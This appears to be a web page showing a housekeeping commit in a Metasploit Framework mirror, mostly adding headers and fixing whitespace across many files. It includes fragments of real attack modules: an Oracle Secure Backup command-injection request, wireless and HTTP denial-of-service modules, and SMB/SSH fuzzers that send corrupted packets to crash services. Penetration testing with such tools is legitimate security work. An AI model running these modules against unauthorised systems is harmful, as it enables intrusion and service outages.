adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions 9 Packages Projects Releases Wiki Activity

more cleanups

Browse Source 
git-svn-id: file:///home/svn/framework3/trunk@9212 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
Joshua Drake
2010-05-03 17:13:09 +00:00
parent df9ec8a08c
commit 0e72894e58
169 changed files with 1487 additions and 946 deletions
Download Patch File Download Diff File Expand all files Collapse all files
data/msfcrawler/basic.rb
+22 -9
View File
@@ -1,3 +1,16 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# $Revision$
require 'rubygems'
require 'pathname'
require 'hpricot'
@@ -6,28 +19,28 @@ require 'uri'
class CrawlerSimple < BaseParser
def parse(request,result)
if !result['Content-Type'].include? "text/html"
return
end
doc = Hpricot(result.body.to_s)
doc.search('a').each do |link|
hr = link.attributes['href']
if hr and !hr.match(/^(\#|javascript\:)/)
if hr and !hr.match(/^(\#|javascript\:)/)
begin
hreq = urltohash('GET',hr,request['uri'],nil)
hreq = urltohash('GET',hr,request['uri'],nil)
insertnewpath(hreq)
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
end
end
end
end
end
data/msfcrawler/flash.rb
+33 -21
View File
@@ -1,8 +1,20 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# $Revision$
require 'rubygems'
require 'pathname'
require 'uri'
$flarebinary = "/home/et/Downloads/flare"
$flareoutdir = "/home/et/Downloads/"
@@ -13,52 +25,52 @@ class CrawlerFlash < BaseParser
rexp = ['loadMovieNum\(\'(.*?)\'',
'loadMovie\(\'(.*?)\'',
'getURL\(\'(.*?)\''
]
]
if !result['Content-Type'].include? "application/x-shockwave-flash"
return
end
outswf = File.join($flareoutdir,request['uri'].gsub(/\//,'_'))
puts "Downloading SWF file to: #{outswf}"
ffile = File.new(outswf, "wb")
puts "Downloading SWF file to: #{outswf}"
ffile = File.new(outswf, "wb")
ffile.puts(result.body)
ffile.close
ffile.close
system("#{$flarebinary} #{outswf}")
outflr = outswf.gsub('.swf','.flr')
if File.exists?(outflr)
puts "Decompiled SWF file to: #{outflr}"
puts "Decompiled SWF file to: #{outflr}"
else
puts "Error: Decompilation failed."
return
end
File.open(outflr, "r") do |infile|
while (line = infile.gets)
rexp.each do |r|
links = line.to_s.scan(Regexp.new(r,true)) #"
links.each do |link|
rexp.each do |r|
links = line.to_s.scan(Regexp.new(r,true)) #"
links.each do |link|
begin
hreq = urltohash('GET',link[0],request['uri'],nil)
insertnewpath(hreq)
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
end
end
end
end
end
end
end
end
end
data/msfcrawler/forms.rb
+33 -20
View File
@@ -1,3 +1,16 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# $Revision$
require 'rubygems'
require 'pathname'
require 'hpricot'
@@ -6,11 +19,11 @@ require 'uri'
class CrawlerForms < BaseParser
def parse(request,result)
if !result['Content-Type'].include? "text/html"
return
end
hr = ''
m = ''
@@ -21,44 +34,44 @@ class CrawlerForms < BaseParser
fname = f.attributes['name']
if fname.empty?
fname = "NONE"
end
end
m = "GET"
if !f.attributes['method'].empty?
m = f.attributes['method'].upcase
end
#puts "Parsing form name: #{fname} (#{m})"
#puts "Parsing form name: #{fname} (#{m})"
htmlform = Hpricot(f.inner_html)
arrdata = []
htmlform.search('input').each do |p|
#puts p.attributes['name']
#puts p.attributes['type']
#puts p.attributes['value']
#raw_request has uri_encoding disabled as it encodes '='.
arrdata << (p.attributes['name'] + "=" + Rex::Text.uri_encode(p.attributes['value']))
#raw_request has uri_encoding disabled as it encodes '='.
arrdata << (p.attributes['name'] + "=" + Rex::Text.uri_encode(p.attributes['value']))
end
data = arrdata.join("&").to_s
begin
hreq = urltohash(m,hr,request['uri'],data)
hreq['ctype'] = 'application/x-www-form-urlencoded'
insertnewpath(hreq)
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
end
end
end
end
end
data/msfcrawler/objects.rb
+20 -7
View File
@@ -1,3 +1,16 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# $Revision$
require 'rubygems'
require 'pathname'
require 'hpricot'
@@ -6,11 +19,11 @@ require 'uri'
class CrawlerObjects < BaseParser
def parse(request,result)
if !result['Content-Type'].include? "text/html"
return
end
hr = ''
m = ''
@@ -21,15 +34,15 @@ class CrawlerObjects < BaseParser
begin
hreq = urltohash('GET',s,request['uri'],nil)
insertnewpath(hreq)
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
end
end
end
end
end
data/msfcrawler/scripts.rb
+21 -8
View File
@@ -1,3 +1,16 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# $Revision$
require 'rubygems'
require 'pathname'
require 'hpricot'
@@ -6,11 +19,11 @@ require 'uri'
class CrawlerScripts < BaseParser
def parse(request,result)
if !result['Content-Type'].include? "text/html"
return
end
hr = ''
m = ''
@@ -20,16 +33,16 @@ class CrawlerScripts < BaseParser
s = obj['src']
begin
hreq = urltohash('GET',s,request['uri'],nil)
hreq = urltohash('GET',s,request['uri'],nil)
insertnewpath(hreq)
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
end
end
end
end
end
documentation/samples/framework/dump_module_info.rb
+4
View File
@@ -1,8 +1,12 @@
#!/usr/bin/env ruby
#
# $Id$
#
# This sample demonstrates how a module's information can be easily serialized
# to a readable format.
#
# $Revision$
#
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
documentation/samples/framework/encode_file.rb
+4
View File
@@ -1,8 +1,12 @@
#!/usr/bin/env ruby
#
# $Id$
#
# This sample demonstrates how a file can be encoded using a framework
# encoder.
#
# $Revision$
#
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
documentation/samples/framework/enumerate_modules.rb
+4
View File
@@ -1,8 +1,12 @@
#!/usr/bin/env ruby
#
# $Id$
#
# This sample demonstrates enumerating all of the modules in the framework and
# displays their module type and reference name.
#
# $Revision$
#
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
documentation/samples/framework/run_exploit_using_base.rb
+4
View File
@@ -1,9 +1,13 @@
#!/usr/bin/env ruby
#
# $Id$
#
# This sample demonstrates using the framework core directly to launch an
# exploit. It makes use of the simplified exploit wrapper method provided by
# the Msf::Simple::Exploit mixin.
#
# $Revision$
#
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
documentation/samples/framework/run_exploit_using_core.rb
+4
View File
@@ -1,10 +1,14 @@
#!/usr/bin/env ruby
#
# $Id$
#
# This sample demonstrates using the framework core directly to launch an
# exploit. It uses the framework base Framework class so that the
# distribution module path is automatically set, but relies strictly on
# framework core classes for everything else.
#
# $Revision$
#
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
documentation/samples/modules/auxiliary/sample.rb
+3 -4
View File
@@ -1,15 +1,14 @@
##
# $Id: test.rb 4419 2007-02-18 00:10:39Z hdm $
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
@@ -49,7 +48,7 @@ class Auxiliary::Sample < Msf::Auxiliary
def cmd_aux_extra_command(*args)
print_status("Running inside aux_extra_command()")
end
end
end
documentation/samples/modules/encoders/sample.rb
+14 -3
View File
@@ -1,3 +1,14 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
module Msf
module Encoders
@@ -28,7 +39,7 @@ class Sample < Msf::Encoder
buf
end
end
end
end
end
end
documentation/samples/modules/exploits/sample.rb
+17 -3
View File
@@ -1,3 +1,14 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
module Msf
@@ -19,20 +30,23 @@ class Exploits::Sample < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Sample exploit',
'Description' => %q{
This exploit module illustrates how a vulnerability could be exploited
This exploit module illustrates how a vulnerability could be exploited
in an TCP server that has a parsing bug.
},
'Author' => 'skape',
'Version' => '$Revision$',
'References' =>
[
],
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
},
'Targets' =>
'Targets' =>
[
# Target 0: Windows All
[
[
'Windows Universal',
{
'Platform' => 'win',
documentation/samples/modules/nops/sample.rb
+11
View File
@@ -1,3 +1,14 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
module Msf
documentation/samples/modules/payloads/singles/sample.rb
+13 -2
View File
@@ -1,3 +1,14 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
module Msf
@@ -30,6 +41,6 @@ module Sample
end
end
end
end
end
end
modules/auxiliary/admin/http/tomcat_administration.rb
+4 -1
View File
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -5,7 +9,6 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
modules/auxiliary/admin/motorola/wr850g_cred.rb
+12 -1
View File
@@ -1,3 +1,14 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
@@ -8,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => 'Motorola WR850G v4.03 Credentials',
'Description' => %q{
Login credentials to the Motorola WR850G router with
Login credentials to the Motorola WR850G router with
firmware v4.03 can be obtained via a simple GET request
if issued while the administrator is logged in. A lot
more information is available through this request, but
modules/auxiliary/admin/oracle/oracle_sql.rb
+1 -1
View File
@@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 7688 $',
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'https://www.metasploit.com/users/mc' ],
modules/auxiliary/admin/oracle/osb_execqr.rb
+8 -4
View File
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -44,14 +48,14 @@ class Metasploit3 < Msf::Auxiliary
cmd = datastore['CMD']
uri = "/login.php?clear=no&ora_osb_lcookie=&ora_osb_bgcookie=#{r}&button=Logout&rbtool="
req = uri + Rex::Text.uri_encode(cmd)
print_status("Sending command: #{datastore['CMD']}...")
res = send_request_raw({'uri' => req,},5)
print_status("Done.")
end
end
modules/auxiliary/dos/wifi/cts_rts_flood.rb
+5 -5
View File
@@ -20,14 +20,14 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => 'Wireless CTS/RTS Flooder',
'Description' => %q{
This module sends 802.11 CTS/RTS requests to a specific wireless peer,
using the specified source address,
},
This module sends 802.11 CTS/RTS requests to a specific wireless peer,
using the specified source address,
},
'Author' => [ 'Brad Antoniewicz' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
))
))
register_options(
[
OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]),
modules/auxiliary/dos/wifi/file2air.rb
+14 -3
View File
@@ -1,15 +1,26 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Wireless Frame (File) Injector',
'Description' => %q{
Inspired by Josh Wright's file2air, this module writes
Inspired by Josh Wright's file2air, this module writes
wireless frames from a binary file to the air, allowing
you to substitute some addresses before it gets sent.
Unlike the original file2air (currently v1.1), this module
@@ -62,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary
end
close_wifi
end
end
def substaddrs(frame)
tods = (frame[1] & 1) == 1
modules/auxiliary/dos/wifi/netgear_ma521_rates.rb
+1 -3
View File
@@ -9,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
@@ -35,8 +33,8 @@ class Metasploit3 < Msf::Auxiliary
with a supported wireless card. Please see the Ruby Lorcon2 documentation
(external/ruby-lorcon/README) for more information.
},
'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
'Version' => '$Revision$',
'License' => MSF_LICENSE,
'References' =>
[
modules/auxiliary/dos/wifi/netgear_wg311pci.rb
+3 -6
View File
@@ -9,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
@@ -32,18 +30,17 @@ class Metasploit3 < Msf::Auxiliary
This module depends on the Lorcon2 library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon2 documentation
(external/ruby-lorcon/README) for more information.
},
'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
'Version' => '$Revision$',
'License' => MSF_LICENSE,
'References' =>
[
[
['CVE', '2006-6125'],
['OSVDB', '30511'],
['URL', 'http://projects.info-pull.com/mokb/MOKB-22-11-2006.html'],
['URL', 'ftp://downloads.netgear.com/files/wg311_1_3.zip'],
]
]
))
register_options(
[
modules/auxiliary/dos/windows/http/pi3web_isapi.rb
+14 -3
View File
@@ -1,12 +1,23 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Pi3Web <=2.0.13 ISAPI DoS',
'Description' => %q{
The Pi3Web HTTP server crashes when a request is made
@@ -39,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Request sent to #{rhost}:#{rport}")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_status("Couldn't connect to #{rhost}:#{rport}")
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb
+12 -12
View File
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Fuzzer
def initialize(info = {})
super(update_info(info,
'Name' => 'SMB Negotiate SMB2 Dialect Corruption',
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test'])
], self.class)
end
def do_smb_negotiate(pkt,opts={})
@connected = false
connect
@@ -41,27 +41,27 @@ class Metasploit3 < Msf::Auxiliary
sock.put(pkt)
sock.get_once(-1, opts[:timeout])
end
def run
last_str = nil
last_inp = nil
last_err = nil
pkt = make_smb_negotiate
cnt = 0
max = datastore['MAXDEPTH'].to_i
max = nil if max == 0
tot = ( max ? [max,pkt.length].min : pkt.length) * 256
print_status("Fuzzing SMB negotiate packet with #{tot} requests")
fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
cnt += 1
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
end
begin
r = do_smb_negotiate(str, 0.25)
rescue ::Interrupt
@@ -72,21 +72,21 @@ class Metasploit3 < Msf::Auxiliary
ensure
disconnect
end
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
print_status("Could not connect to the service: #{last_err}")
print_status("Could not connect to the service: #{last_err}")
end
return
end
last_str = str
last_inp = @last_fuzzer_input
end
end
def make_smb_negotiate
# The SMB 2 dialect must be there
dialects = ['PC NETWORK PROGRAM 1.0', 'LANMAN1.0', 'Windows for Workgroups 3.1a', 'LM1.2X002', 'LANMAN2.1', 'NT LM 0.12', 'SMB 2.002']
modules/auxiliary/fuzzers/smb/smb_create_pipe.rb
+9 -9
View File
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::SMB
include Msf::Auxiliary::Fuzzer
def initialize(info = {})
super(update_info(info,
'Name' => 'SMB Create Pipe Request Fuzzer',
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary
'Version' => '$Revision$'
))
end
def do_smb_create(pkt,opts={})
@connected = false
connect
@@ -37,21 +37,21 @@ class Metasploit3 < Msf::Auxiliary
@connected = true
smb_create("\\" + pkt)
end
def run
last_str = nil
last_inp = nil
last_err = nil
cnt = 0
fuzz_strings do |str|
cnt += 1
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
end
begin
do_smb_create(str, 0.25)
rescue ::Interrupt
@@ -62,16 +62,16 @@ class Metasploit3 < Msf::Auxiliary
ensure
disconnect
end
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
print_status("Could not connect to the service: #{last_err}")
print_status("Could not connect to the service: #{last_err}")
end
return
end
last_str = str
last_inp = @last_fuzzer_input
end
modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb
+19 -19
View File
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::SMB
include Msf::Auxiliary::Fuzzer
def initialize(info = {})
super(update_info(info,
'Name' => 'SMB Create Pipe Request Corruption',
@@ -32,43 +32,43 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('SMBPIPE', [true, 'Specify the pipe name to corrupt', "\\BROWSER"])
], self.class)
end
def do_smb_login(pkt,opts={})
@connected = false
connect
smb_login
@connected = true
sock.put(pkt)
sock.get_once(-1, opts[:timeout])
end
def run
# Connect in order to get the server-assigned user-id/tree-id
connect
smb_login
pkt = make_smb_create
disconnect
last_str = nil
last_inp = nil
last_err = nil
cnt = 0
max = datastore['MAXDEPTH'].to_i
max = nil if max == 0
tot = ( max ? [max,pkt.length].min : pkt.length) * 256
print_status("Fuzzing SMB create pipe with #{tot} requests")
fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
cnt += 1
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
end
begin
r = do_smb_login(str, 0.25)
rescue ::Interrupt
@@ -79,42 +79,42 @@ class Metasploit3 < Msf::Auxiliary
ensure
disconnect
end
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
print_status("Could not connect to the service: #{last_err}")
print_status("Could not connect to the service: #{last_err}")
end
return
end
last_str = str
last_inp = @last_fuzzer_input
end
end
def make_smb_create
filename = datastore['SMBPIPE']
disposition = 1
impersonation = 2
pkt = Rex::Proto::SMB::Constants::SMB_CREATE_PKT.make_struct
self.simple.client.smb_defaults(pkt['Payload']['SMB'])
pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NT_CREATE_ANDX
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
pkt['Payload']['SMB'].v['WordCount'] = 24
pkt['Payload'].v['AndX'] = 255
pkt['Payload'].v['FileNameLen'] = filename.length
pkt['Payload'].v['CreateFlags'] = 0x16
pkt['Payload'].v['AccessMask'] = 0x02000000 # Maximum Allowed
pkt['Payload'].v['ShareAccess'] = 7
pkt['Payload'].v['CreateOptions'] = 0
pkt['Payload'].v['Impersonation'] = impersonation
pkt['Payload'].v['Impersonation'] = impersonation
pkt['Payload'].v['Disposition'] = disposition
pkt['Payload'].v['Payload'] = filename + "\x00"
pkt.to_s
modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb
+12 -12
View File
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Fuzzer
def initialize(info = {})
super(update_info(info,
'Name' => 'SMB Negotiate Dialect Corruption',
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test'])
], self.class)
end
def do_smb_negotiate(pkt,opts={})
@connected = false
connect
@@ -40,27 +40,27 @@ class Metasploit3 < Msf::Auxiliary
sock.put(pkt)
sock.get_once(-1, opts[:timeout])
end
def run
last_str = nil
last_inp = nil
last_err = nil
pkt = make_smb_negotiate
cnt = 0
max = datastore['MAXDEPTH'].to_i
max = nil if max == 0
tot = ( max ? [max,pkt.length].min : pkt.length) * 256
print_status("Fuzzing SMB negotiate packet with #{tot} requests")
fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
cnt += 1
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
end
begin
r = do_smb_negotiate(str, 0.25)
rescue ::Interrupt
@@ -71,21 +71,21 @@ class Metasploit3 < Msf::Auxiliary
ensure
disconnect
end
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
print_status("Could not connect to the service: #{last_err}")
print_status("Could not connect to the service: #{last_err}")
end
return
end
last_str = str
last_inp = @last_fuzzer_input
end
end
def make_smb_negotiate
# The SMB 2 dialect must be there
dialects = ['PC NETWORK PROGRAM 1.0', 'LANMAN1.0', 'Windows for Workgroups 3.1a', 'LM1.2X002', 'LANMAN2.1', 'NT LM 0.12']
modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb
+18 -18
View File
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::SMB
include Msf::Auxiliary::Fuzzer
def initialize(info = {})
super(update_info(info,
'Name' => 'SMB NTLMv1 Login Request Corruption',
@@ -33,37 +33,37 @@ class Metasploit3 < Msf::Auxiliary
OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test'])
], self.class)
end
def do_smb_login(pkt,opts={})
@connected = false
connect
simple.client.negotiate(false)
@connected = true
sock.put(pkt)
sock.get_once(-1, opts[:timeout])
end
def run
last_str = nil
last_inp = nil
last_err = nil
pkt = make_smb_login
cnt = 0
max = datastore['MAXDEPTH'].to_i
max = nil if max == 0
tot = ( max ? [max,pkt.length].min : pkt.length) * 256
print_status("Fuzzing SMB login with #{tot} requests")
fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
cnt += 1
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
end
begin
r = do_smb_login(str, 0.25)
rescue ::Interrupt
@@ -74,23 +74,23 @@ class Metasploit3 < Msf::Auxiliary
ensure
disconnect
end
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
print_status("Could not connect to the service: #{last_err}")
print_status("Could not connect to the service: #{last_err}")
end
return
end
last_str = str
last_inp = @last_fuzzer_input
end
end
def make_smb_login
user = "USER"
domain = "DOMAIN"
hash_lm = Rex::Proto::SMB::Crypt.lanman_des("X", "X" * 8)
@@ -102,10 +102,10 @@ class Metasploit3 < Msf::Auxiliary
data << user + "\x00"
data << domain + "\x00"
data << 'Windows 2000 2195' + "\x00"
data << 'Windows 2000 5.0' + "\x00"
data << 'Windows 2000 5.0' + "\x00"
pkt = Rex::Proto::SMB::Constants::SMB_SETUP_NTLMV1_PKT.make_struct
pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_SESSION_SETUP_ANDX
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
@@ -113,7 +113,7 @@ class Metasploit3 < Msf::Auxiliary
pkt['Payload'].v['AndX'] = 255
pkt['Payload'].v['MaxBuff'] = 0xffdf
pkt['Payload'].v['MaxMPX'] = 2
pkt['Payload'].v['VCNum'] = 1
pkt['Payload'].v['VCNum'] = 1
pkt['Payload'].v['PasswordLenLM'] = hash_lm.length
pkt['Payload'].v['PasswordLenNT'] = hash_nt.length
pkt['Payload'].v['Capabilities'] = 64
modules/auxiliary/fuzzers/ssh/ssh_version_15.rb
+13 -13
View File
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Fuzzer
def initialize(info = {})
super(update_info(info,
'Name' => 'SSH 1.5 Version Fuzzer',
@@ -31,34 +31,34 @@ class Metasploit3 < Msf::Auxiliary
Opt::RPORT(22)
], self.class)
end
def do_ssh_version(pkt,opts={})
@connected = false
connect
@connected = true
@banner = sock.get_once(-1,opts[:banner_timeout])
return if not @banner
sock.put("#{pkt}\r\n")
end
def run
last_str = nil
last_inp = nil
last_err = nil
ver = make_ssh_version_base
cnt = 0
fuzz_strings do |str|
cnt += 1
pkt = ver + str
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
end
begin
r = do_ssh_version(str,:banner_timeout => 5)
rescue ::Interrupt
@@ -69,16 +69,16 @@ class Metasploit3 < Msf::Auxiliary
ensure
disconnect
end
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
print_status("Could not connect to the service: #{last_err}")
print_status("Could not connect to the service: #{last_err}")
end
return
end
if(not @banner)
print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} ")
return
@@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary
last_inp = @last_fuzzer_input
end
end
def make_ssh_version_base
"SSH-1.5-"
end
modules/auxiliary/fuzzers/ssh/ssh_version_2.rb
+13 -13
View File
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Fuzzer
def initialize(info = {})
super(update_info(info,
'Name' => 'SSH 2.0 Version Fuzzer',
@@ -31,34 +31,34 @@ class Metasploit3 < Msf::Auxiliary
Opt::RPORT(22)
], self.class)
end
def do_ssh_version(pkt,opts={})
@connected = false
connect
@connected = true
@banner = sock.get_once(-1,opts[:banner_timeout])
return if not @banner
sock.put("#{pkt}\r\n")
end
def run
last_str = nil
last_inp = nil
last_err = nil
ver = make_ssh_version_base
cnt = 0
fuzz_strings do |str|
cnt += 1
pkt = ver + str
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
end
begin
r = do_ssh_version(str,:banner_timeout => 5)
rescue ::Interrupt
@@ -69,16 +69,16 @@ class Metasploit3 < Msf::Auxiliary
ensure
disconnect
end
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
print_status("Could not connect to the service: #{last_err}")
print_status("Could not connect to the service: #{last_err}")
end
return
end
if(not @banner)
print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} ")
return
@@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary
last_inp = @last_fuzzer_input
end
end
def make_ssh_version_base
"SSH-2.0-"
end
modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb
+13 -13
View File
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Fuzzer
def initialize(info = {})
super(update_info(info,
'Name' => 'SSH Version Corruption',
@@ -32,37 +32,37 @@ class Metasploit3 < Msf::Auxiliary
OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test'])
], self.class)
end
def do_ssh_version(pkt,opts={})
@connected = false
connect
@connected = true
@banner = sock.get_once(-1,opts[:banner_timeout])
return if not @banner
sock.put("#{pkt}\r\n")
end
def run
last_str = nil
last_inp = nil
last_err = nil
pkt = make_ssh_version
